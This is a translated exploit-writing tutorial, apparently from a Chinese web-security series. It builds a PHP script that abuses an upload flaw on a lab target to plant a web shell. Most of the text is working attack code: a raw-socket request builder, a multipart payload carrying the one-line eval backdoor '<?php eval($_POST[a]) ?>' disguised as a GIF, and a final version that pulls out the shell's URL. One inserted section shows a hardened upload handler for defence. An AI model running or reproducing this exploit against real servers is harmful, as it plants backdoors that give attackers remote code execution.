Web Security, Chapter 7: Exploit Writing, Part 3: Writing a GETSHELL
In the previous article I walked you through writing a POST injection exploit. This one is also about POST submissions. Many of you like GETSHELL, so how do you write a GETSHELL script?
"Getshell" means obtaining access directly, either by executing commands straight away or by uploading a web trojan (getwebshell).
Open the 暗月 lab target system and go to the upload vulnerability test.
Testing shows that the upload test page lets you upload an image trojan directly. Capture the request with Burp Suite.
```http
POST /upload.php HTTP/1.1
Host: target_sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://target_sys.com/upload.php
Content-Type: multipart/form-data; boundary=---------------------------86531354118821
Content-Length: 23124
Cookie: PHPSESSID=8fj89vrpvaavg5sc92ifg5gu75
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------86531354118821
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg

GIF89ad
```
The GETSHELL is written in PHP using the socket extension; make sure socket.dll is enabled in php.ini.
```php
function http_send($host, $packet) {
    $resp = '';
    // Open a raw TCP connection to port 80 and retry once if it fails
    $sock = fsockopen($host, 80);
    if (!$sock) {
        print "\n[-] No response from {$host}:80 Trying again...";
        $sock = fsockopen($host, 80);
    }
    // Write the hand-built HTTP request and read until the server closes
    fputs($sock, $packet);
    while (!feof($sock)) {
        $resp .= fread($sock, 1024);
    }
    fclose($sock);
    return $resp;
}
```
The code above simulates sending a POST packet and reading back the response.
```php
function data($host, $filename) {
    // Multipart body: the file part, the submit field, then the closing boundary
    $payload  = "-----------------------------86531354118821\r\n";
    $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
    $payload .= "Content-Type: image/jpeg\r\n\r\n";
    $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
    $payload .= "-----------------------------86531354118821\r\n";
    $payload .= "Content-Disposition: form-data; name=\"sub\"";
    $payload .= "\r\n\r\n";
    $payload .= "12132\r\n";
    $payload .= "-----------------------------86531354118821--\r\n";
    // Request line and headers; Content-Length must match the body exactly
    $packet  = "POST /upload.php HTTP/1.1\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;
    return $packet;
}
```
This builds the POST packet; once assembled it is the same as the captured packet.
`---------------------------86531354118821--` is the boundary string. It must match the boundary declared in the Content-Type header, and the trailing `--` marks the end of the multipart body.
```php
$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
```
This part is the content of the image trojan you are uploading.
```php
$filename = "moon.php";
$host = "target_sys.com";
print http_send($host, data($host, $filename));
```
`$filename` is the name of the file to upload; `$host` is the domain name.
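On the server side, the request above only succeeds because upload.php trusts the client's filename and Content-Type. As an added example that is not part of the original post or the lab's own upload.php, here is a weak check of the kind the exploit relies on beside a hardened handler; the form field name `file`, the `uploads/` directory outside the web root and the 2 MB limit are assumptions.

```php
<?php
// Added example (not the lab's upload.php): weak check vs. hardened check.

// Weak check: trusts the client-supplied Content-Type, so "moon.php" sent
// as image/jpeg with a GIF89a prefix is accepted and stored as PHP.
function weak_accept(array $f): bool {
    return in_array($f['type'], ['image/jpeg', 'image/png', 'image/gif'], true);
}

// Hardened check: extension allowlist, server-side content sniffing,
// decode-and-re-encode, and a server-chosen filename. Returns the stored
// name or null with $reason set.
function hardened_accept(array $f, string &$reason): ?string {
    $allowed = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
    if ($f['error'] !== UPLOAD_ERR_OK || $f['size'] > 2 * 1024 * 1024) {
        $reason = 'upload error or file too large'; return null;
    }
    // 1. Extension from the client filename, checked against an allowlist.
    $ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) { $reason = "extension .$ext not allowed"; return null; }
    // 2. Ignore $f['type']; sniff the bytes the server actually received.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
    if ($mime !== $allowed[$ext]) { $reason = "content is $mime, not {$allowed[$ext]}"; return null; }
    // 3. A bare GIF89a header still passes libmagic, so require that the
    //    image actually decodes with GD.
    $img = @imagecreatefromstring(file_get_contents($f['tmp_name']));
    if ($img === false) { $reason = 'not a decodable image'; return null; }
    // 4. Random server-chosen name in a directory outside the web root
    //    (assumed path); the client's filename is never reused.
    $dest = __DIR__ . '/../uploads/' . bin2hex(random_bytes(16)) . '.' . $ext;
    // Re-encoding writes only pixel data, so any appended PHP bytes are dropped.
    $ok = match ($ext) {
        'jpg' => imagejpeg($img, $dest, 90),
        'png' => imagepng($img, $dest),
        'gif' => imagegif($img, $dest),
    };
    imagedestroy($img);
    if (!$ok) { $reason = 'could not write image'; return null; }
    return basename($dest);
}

if (isset($_FILES['file'])) {
    $reason = '';
    $name = hardened_accept($_FILES['file'], $reason);
    echo $name === null ? "Rejected: $reason" : "Stored as: $name";
}
```

Against the post's payload, the hardened handler rejects `moon.php` at step 1, and a renamed `moon.gif` containing only `GIF89a` plus PHP fails at step 3 or is re-encoded without the payload at step 4.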
Below is the getshell code. Save it as exp2.php.
```php
<?php
function http_send($host, $packet) {
    $resp = '';
    // Open a raw TCP connection to port 80 and retry once if it fails
    $sock = fsockopen($host, 80);
    if (!$sock) {
        print "\n[-] No response from {$host}:80 Trying again...";
        $sock = fsockopen($host, 80);
    }
    // Write the hand-built HTTP request and read until the server closes
    fputs($sock, $packet);
    while (!feof($sock)) {
        $resp .= fread($sock, 1024);
    }
    fclose($sock);
    return $resp;
}

function data($host, $filename) {
    // Multipart body: the file part, the submit field, then the closing boundary
    $payload  = "-----------------------------86531354118821\r\n";
    $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
    $payload .= "Content-Type: image/jpeg\r\n\r\n";
    $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
    $payload .= "-----------------------------86531354118821\r\n";
    $payload .= "Content-Disposition: form-data; name=\"sub\"";
    $payload .= "\r\n\r\n";
    $payload .= "12132\r\n";
    $payload .= "-----------------------------86531354118821--\r\n";
    // Request line and headers; Content-Length must match the body exactly
    $packet  = "POST /upload.php HTTP/1.1\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;
    return $packet;
}

$filename = "moon.php";
$host = "target_sys.com";
print http_send($host, data($host, $filename));
```
Run the script, as shown in the figure.
The terminal prints a lot of output, most of which we do not want, so we extract the WEBSHELL path from the response and return only that. The complete exp is as follows:
```php
<?php
function http_send($host, $packet) {
    $resp = '';
    // Open a raw TCP connection to port 80 and retry once if it fails
    $sock = fsockopen($host, 80);
    if (!$sock) {
        print "\n[-] No response from {$host}:80 Trying again...";
        $sock = fsockopen($host, 80);
    }
    // Write the hand-built HTTP request and read until the server closes
    fputs($sock, $packet);
    while (!feof($sock)) {
        $resp .= fread($sock, 1024);
    }
    fclose($sock);
    return $resp;
}

function data($host, $filename) {
    // Multipart body: the file part, the submit field, then the closing boundary
    $payload  = "-----------------------------86531354118821\r\n";
    $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
    $payload .= "Content-Type: image/jpeg\r\n\r\n";
    $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
    $payload .= "-----------------------------86531354118821\r\n";
    $payload .= "Content-Disposition: form-data; name=\"sub\"";
    $payload .= "\r\n\r\n";
    $payload .= "12132\r\n";
    $payload .= "-----------------------------86531354118821--\r\n";
    // Request line and headers; Content-Length must match the body exactly
    $packet  = "POST /upload.php HTTP/1.1\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;
    return $packet;
}

$filename = "moon.php";
$host = "target_sys.com";
$html_str = http_send($host, data($host, $filename));
// Pull only the stored path out of the HTML response instead of dumping it all
preg_match("/Stored in: (.*?)</", $html_str, $m);
if (!empty($m[1])) {
    echo "http://".$host."/".$m[1];
} else {
    echo "false";
}
```
Exp download: exp2.rar
Run the script.